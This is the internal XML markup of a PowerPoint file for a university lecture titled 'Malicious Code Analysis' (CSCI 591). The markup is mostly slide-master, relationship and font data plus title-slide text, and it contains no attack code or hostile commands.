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 id="2147483657" r:id="rId6"/>
    <p:sldMasterId id="2147483659" r:id="rId7"/>
    <p:sldMasterId id="2147483661" r:id="rId8"/>
    <p:sldMasterId id="2147483663" r:id="rId9"/>
    <p:sldMasterId id="2147483665" r:id="rId10"/>
    <p:sldMasterId id="2147483667" r:id="rId11"/>
    <p:sldMasterId id="2147483669" r:id="rId12"/>
    <p:sldMasterId id="2147483671" r:id="rId13"/>
    <p:sldMasterId id="2147483673" r:id="rId14"/>
    <p:sldMasterId id="2147483675" r:id="rId15"/>
    <p:sldMasterId id="2147483677" r:id="rId16"/>
    <p:sldMasterId id="2147483679" r:id="rId17"/>
    <p:sldMasterId id="2147483681" r:id="rId18"/>
    <p:sldMasterId id="2147483683" r:id="rId19"/>
    <p:sldMasterId id="2147483685" r:id="rId20"/>
    <p:sldMasterId id="2147483687" r:id="rId21"/>
    <p:sldMasterId id="2147483689" r:id="rId22"/>
    <p:sldMasterId id="2147483691" r:id="rId23"/>
    <p:sldMasterId id="2147483693" r:id="rId24"/>
    <p:sldMasterId id="2147483695" r:id="rId25"/>
    <p:sldMasterId id="2147483697" r:id="rId26"/>
    <p:sldMasterId id="2147483699" r:id="rId27"/>
    <p:sldMasterId id="2147483701" r:id="rId28"/>
    <p:sldMasterId id="2147483703" r:id="rId29"/>
    <p:sldMasterId id="2147483705" r:id="rId30"/>
    <p:sldMasterId id="2147483707" r:id="rId31"/>
    <p:sldMasterId id="2147483709" r:id="rId32"/>
    <p:sldMasterId id="2147483711" r:id="rId33"/>
    <p:sldMasterId id="2147483713" r:id="rId34"/>
    <p:sldMasterId id="2147483715" r:id="rId35"/>
    <p:sldMasterId id="2147483717" r:id="rId36"/>
    <p:sldMasterId id="2147483719" r:id="rId37"/>
    <p:sldMasterId id="2147483721" r:id="rId38"/>
    <p:sldMasterId id="2147483723" r:id="rId39"/>
    <p:sldMasterId id="2147483725" r:id="rId40"/>
    <p:sldMasterId id="2147483727" r:id="rId41"/>
    <p:sldMasterId id="2147483729" r:id="rId42"/>
    <p:sldMasterId id="2147483731" r:id="rId43"/>
    <p:sldMasterId id="2147483733" r:id="rId44"/>
    <p:sldMasterId id="2147483735" r:id="rId45"/>
    <p:sldMasterId id="2147483737" r:id="rId46"/>
    <p:sldMasterId id="2147483739" r:id="rId47"/>
    <p:sldMasterId id="2147483741" r:id="rId48"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId51"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId49"/>
    <p:sldId id="263" r:id="rId50"/>
    <p:sldId id="665" r:id="rId52"/>
    <p:sldId id="642" r:id="rId53"/>
    <p:sldId id="643" r:id="rId54"/>
    <p:sldId id="644" r:id="rId55"/>
    <p:sldId id="729" r:id="rId56"/>
    <p:sldId id="767" r:id="rId57"/>
    <p:sldId id="666" r:id="rId58"/>
    <p:sldId id="691" r:id="rId59"/>
    <p:sldId id="690" r:id="rId60"/>
    <p:sldId id="692" r:id="rId61"/>
    <p:sldId id="743" r:id="rId62"/>
    <p:sldId id="744" r:id="rId63"/>
    <p:sldId id="745" r:id="rId64"/>
    <p:sldId id="746" r:id="rId65"/>
    <p:sldId id="747" r:id="rId66"/>
    <p:sldId id="748" r:id="rId67"/>
    <p:sldId id="749" r:id="rId68"/>
    <p:sldId id="750" r:id="rId69"/>
    <p:sldId id="768" r:id="rId70"/>
    <p:sldId id="769" r:id="rId71"/>
    <p:sldId id="770" r:id="rId72"/>
    <p:sldId id="771" r:id="rId73"/>
    <p:sldId id="751" r:id="rId74"/>
    <p:sldId id="689" r:id="rId75"/>
    <p:sldId id="693" r:id="rId76"/>
    <p:sldId id="703" r:id="rId77"/>
    <p:sldId id="752" r:id="rId78"/>
    <p:sldId id="753" r:id="rId79"/>
    <p:sldId id="754" r:id="rId80"/>
    <p:sldId id="755" r:id="rId81"/>
    <p:sldId id="637" r:id="rId82"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
      <p:regular r:id="rId86"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
      <p:regular r:id="rId87"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="微软雅黑" pitchFamily="34" charset="-122"/>
      <p:regular r:id="rId88"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Segoe UI" panose="020B0502040204020203"/>
      <p:regular r:id="rId89"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="微软雅黑 Light" charset="-122"/>
      <p:regular r:id="rId90"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Calibri" panose="020F0502020204030204" charset="0"/>
      <p:regular r:id="rId91"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="等线" charset="-122"/>
      <p:regular r:id="rId92"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Calibri" panose="020F0502020204030204"/>
      <p:regular r:id="rId93"/>
    </p:embeddedFont>
  </p:embeddedFontLst>
  <p:custDataLst>
    <p:tags r:id="rId9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A7AF"/>
    <a:srgbClr val="D1202F"/>
    <a:srgbClr val="0000FF"/>
    <a:srgbClr val="FADBD8"/>
    <a:srgbClr val="37BECC"/>
    <a:srgbClr val="D7F2F5"/>
    <a:srgbClr val="E74C3C"/>
    <a:srgbClr val="CA3E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1" d="100"/>
          <a:sy n="71" d="100"/>
        </p:scale>
        <p:origin x="412" y="44"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="3942"/>
        <p:guide pos="3896"/>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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag399.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font8.fntdata"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font7.fntdata"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font6.fntdata"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font5.fntdata"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster8.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font4.fntdata"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font3.fntdata"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font2.fntdata"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1.fntdata"/><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slide" Target="slides/slide33.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide32.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide31.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster7.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide30.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide29.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide28.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide25.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide24.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide23.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide22.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide21.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster6.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster5.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster4.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.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21922-B392-49CB-98B2-D1506FCEECF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082BF-40C1-4E6C-9085-1B48E30F0BD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动画？</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23020B4-C4F0-47FB-9EF6-DA1D8CA35CE4}"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E284FBA-1E51-41CA-94CE-3C4A9B97CA20}" type="slidenum">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="等线" charset="-122"/>
                <a:ea typeface="等线" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="等线" charset="-122"/>
              <a:ea typeface="等线"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0"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0"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0"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tags" Target="../tags/tag77.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7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0"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0"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theme" Target="../theme/theme17.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout18.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster18.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme18.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout19.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster19.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme19.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme20.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout21.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster21.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme21.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout22.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster2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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag132.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag131.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13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0"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tags" Target="../tags/tag139.xml"/><Relationship Id="rId10"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0"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5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5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6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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme30.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme31.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme32.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme33.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme34.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme35.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme36.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme37.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme38.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme39.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme40.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme41.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme42.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme43.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag218.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme44.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag222.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme45.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag226.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme46.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag230.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29.xml"/><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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme47.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23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24.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0"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0"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0"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0"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6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image" Target="../media/image5.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image" Target="../media/image4.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag235.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tags" Target="../tags/tag291.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag290.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tags" Target="../tags/tag293.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag292.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide12.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image" Target="../media/image6.svg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><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image" Target="../media/image5.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide8.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag304.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag303.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag302.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag301.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag300.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag299.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29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9.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><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0.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><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tags" Target="../tags/tag315.xml"/><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33.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><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2.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249.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag240.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45.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><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tags" Target="../tags/tag343.xml"/><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47.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><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48.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><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tags" Target="../tags/tag355.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><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35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8.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag359.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3.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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.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9.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag36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xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag361.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide32.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide28.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout41.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag387.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag386.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag385.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag384.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag383.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag382.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag381.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag363.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag380.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag379.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag378.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag377.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag376.xml"/><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tags" Target="../tags/tag373.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tags" Target="../tags/tag362.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide33.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag395.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag394.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag393.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag392.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag391.xml"/><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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide29.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag398.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag397.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag396.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4.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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag270.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.svg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag269.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag260.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272.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag271.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tags" Target="../tags/tag274.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag273.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8.xml"/><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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag279.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag278.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9.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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.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mn-cs"/>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rPr>
              <a:t>2023.09.26</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panose="020B0604020202020204"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>Malicious Code Analysis</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="6000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:sym typeface="Arial" panose="020B0604020202020204"/>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Fangtian Zhong</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Pts val="2200"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>CSCI 591</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-GB" sz="2500" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:sym typeface="Arial" panose="020B0604020202020204"/>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rPr>
              <a:t>Gianforte School of Computing </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rPr>
              <a:t>Norm Asbjornson College of Engineering</a:t>
            </a:r>
